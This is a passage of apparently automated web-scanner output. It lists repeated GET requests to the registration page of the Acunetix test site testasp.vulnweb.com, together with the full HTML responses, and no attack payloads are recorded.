name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=48 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D48" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=49 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D49" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 374 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=5 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:00 GMT Content-Length: 3550 |
Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D5" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=50 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D50" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=51 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:06 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D51" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=52 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D52" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=53 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D53" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 |
Method | GET |
Parameter | |
Attack | |
Evidence | |
Request Header - size: 376 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=54 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:07 GMT Content-Length: 3551 |
Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D54" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td 